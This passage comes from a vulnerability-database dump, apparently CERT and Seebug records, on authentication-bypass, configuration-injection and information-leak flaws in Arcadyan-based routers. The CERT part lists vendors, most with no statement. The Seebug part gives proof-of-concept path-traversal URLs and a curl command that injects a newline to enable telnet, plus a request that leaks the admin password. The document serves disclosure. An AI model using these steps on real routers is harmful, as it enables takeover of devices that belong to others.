the vendor.\n\n### Mitel Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Motorola Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NETGEAR Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NetComm Wireless Limited Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nokia Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quagga Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quantenna Communications Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ruckus Wireless Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### SMC Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TDS Telecom Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TP-LINK Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Technicolor Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ubiquiti Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### eero Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### pfSense Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 61 vendors __View less vendors __\n\n \n\n\n### References\n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * <https://vulners.com/cve/CVE-2021-20090>\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n * <https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-10-07 20:26 UTC \n**Document Revision: ** | 15 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T00:00:00", "type": "cert", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "modified": "2021-10-07T20:26:00", "id": "VU:914124", "href": "https://www.kb.cert.org/vuls/id/914124", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2021-08-11T13:47:42", "description": "Tenable has discovered multiple vulnerabilities in routers manufactured by Arcadyan.\n\nDuring the disclosure process for the issues discovered in the Buffalo routers, Tenable discovered that CVE-2021-20090 affected many more devices, as the root cause of the vulnerability exists in the underlying Arcadyan firmware. \n\nPlease note that CVE-2021-20091 and CVE-2021-20092 have only been confirmed on Buffalo WSR-2533 models.\n\nCVE-2021-20090 : Path Traversal\nCVSSv3 Base Score: 8.1\nCVSSv3 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\nA path traversal vulnerability in the web interfaces of networking devices manufactured by Arcadyan, including Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24, could allow unauthenticated remote attackers to bypass authentication.\nThis vulnerability has also been confirmed to affect the following devices\nnote: the firmware versions listed do not indicate the latest affected firmware versions, only the firmware versions on which the issue was confirmed.\nPlease contact the devices' respective vendors for more information.\n\n| Vendor | Device | Found on version |\n| :-----| ----: | :----: |\n| ADB | ADSL wireless IAD router | 1.26S-R-3P |\n| Arcadyan | ARV7519 | 00.96.00.96.617ES |\n| Arcadyan | VRV9517 | 6.00.17 build04 |\n| Arcadyan | VGV7519 | 3.01.116 |\n| Arcadyan | VRV9518 | 1.01.00 build44 |\n| ASMAX | BBR-4MG / SMC7908 ADSL | 0.08 |\n| ASUS | DSL-AC88U (Arc VRV9517) | 1.10.05 build502 |\n| ASUS | DSL-AC87VG (Arc VRV9510) | 1.05.18 build305 |\n| ASUS | DSL-AC3100 | 1.10.05 build503 |\n| ASUS | DSL-AC68VG | 5.00.08 build272 |\n| Beeline | Smart Box Flash | 1.00.13_beta4 |\n| British Telecom | WE410443-SA | 1.02.12 build02 |\n| Buffalo | WSR-2533DHPL2 | 1.02 |\n| Buffalo | WSR-2533DHP3 | 1.24 |\n| Buffalo | BBR-4HG | |\n| Buffalo | BBR-4MG | 2.08 Release 0002 |\n| Buffalo | WSR-3200AX4S | 1.1 |\n| Buffalo | WSR-1166DHP2 | 1.15 |\n| Buffalo | WXR-5700AX7S | 1.11 |\n| Deutsche Telekom | Speedport Smart 3 | 010137.4.8.001.0 |\n| HughesNet | HT2000W | 0.10.10 |\n| KPN | ExperiaBox V10A (Arcadyan VRV9517) | 5.00.48 build453 |\n| KPN | VGV7519 | 3.01.116 |\n| O2 | HomeBox 6441 | 1.01.36 |\n| Orange | LiveBox Fibra (PRV3399) | 00.96.00.96.617ES |\n| Orange | LiveBox Fibra (PRV3399) | 00.96.00.96.617ES |\n| Skinny | Smart Modem (Arcadyan VRV9517) | 6.00.16 build01 |\n| SparkNZ | Smart Modem (Arcadyan VRV9517) | 6.00.17 build04 |\n| Telecom (Argentina) | Arcadyan VRV9518VAC23-A-OS-AM | 1.01.00 build44 |\n| TelMex | PRV33AC | 1.31.005.0012 |\n| TelMex | VRV7006 | |\n| Telstra | Smart Modem Gen 2 (LH1000) | 0.13.01r |\n| Telus | WiFi Hub (PRV65B444A-S-TS) | v3.00.20 |\n| Telus | NH20A | 1.00.10debug build06 |\n| Verizon | Fios G3100 | 2.0.0.6 |\n| Vodafone | EasyBox | 904\t4.16 |\n| Vodafone | EasyBox 903 | 30.05.714 |\n| Vodafone | EasyBox 802 | 20.02.226 |\n\nProof of Concept:\n\nThe vulnerability exists due to a list of folders which fall under a \"bypass list\" for authentication. For most of the devices listed, that means that the vulnerability can be triggered by multiple paths. The simplest examples would be:\n\nFor a device in which http://<ip>/index.htm requires authentication, an attacker could access index.htm using the following paths:\n\nhttp://<ip>/images/..%2findex.htm\nhttp://<ip>/js/..%2findex.htm\nhttp://<ip>/css/..%2findex.htm\nTo have the pages load properly, one will need to use proxy match/replace settings to ensure any resources loaded which require authentication also leverage the path traversal. Additionally, certain files (those found under /cgi/) require a csrf (named httoken on these devices) token and a valid Referer header which will cause an error if the referer includes the ..%2f traversal (which can be match/replaced as well). \n\nCVE-2021-20091 : Configuration File Injection\nCVSSv3 Base Score: 7.5\nCVSSv3 Vector: AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\nThe web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.\nProof of Concept:\nThe injection occurs in parameters which pass from apply_abstract.cgi to the device's global config file. Assuming the user is logged in (or, alternatively, the url can be changed to /images/..%2fapply_abstract.cgi, leveraging the path traversal), the following command could be used to inject a line into the configuration file which enables telnetd. \n\n```\ncurl --include -X POST http://<ip>/apply_abstract.cgi -H \"Referer: http://<ip>/ping.html\" --data \"action=start_ping&httoken=<valid httoken>&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=<ip>%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\"\n```\n\nThe %0A will be interpreted as a newline when the ping address is added to /tmp/etc/config/.glbcfg. When rebooted, a shell will be available on port 23.\nCVE-2021-20092 : Improper Access Control\nCVSSv3 Base Score: 5.9\nCVSSv3 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\nThe web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.\nProof of Concept:\n\nTo get a valid httoken, navigate to http://<ip of device>/loginerror.html in a modern browser (tested on chrome).\nOpen DevTools\nRun getToken() in the Console.\nCopy the token, and use it in the following command from a terminal:\n\n```\n$ curl --include \"http://192.168.11.1/cgi/cgi_i_filter.js?_tn=442853667\" -H \"Referer: http://192.168.11.1/loginerror.html\"\n\nHTTP/1.1 200 OK\nDate: Mon, 13 Jan 2020 15:24:03 GMT\nServer: Arcadyan httpd 1.0\nContent-type: application/x-javascript\nX-FRAME-OPTIONS: SAMEORIGIN\nConnection: close\n\n/*DEMO*/\nvar login_password = \u201c<admin password>\u201c;\n\naddCfg(\"lan_ipaddr\", 0, \"192.168.11.1\");\n```\n\nSolution\nCustomers should seek update and mitigation information from their respective vendors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-11T00:00:00", "type": "seebug", "title": "Buffalo\u548cArcadyan\u591a\u6b3e\u8def\u7531\u5668\u8ba4\u8bc1\u7ed5\u8fc7RCE\u7b49\u591a\u4e2a\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "modified": "2021-08-11T00:00:00", "id": "SSV:99329", "href": "https://www.seebug.org/vuldb/ssvid-99329", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
Remote code execution
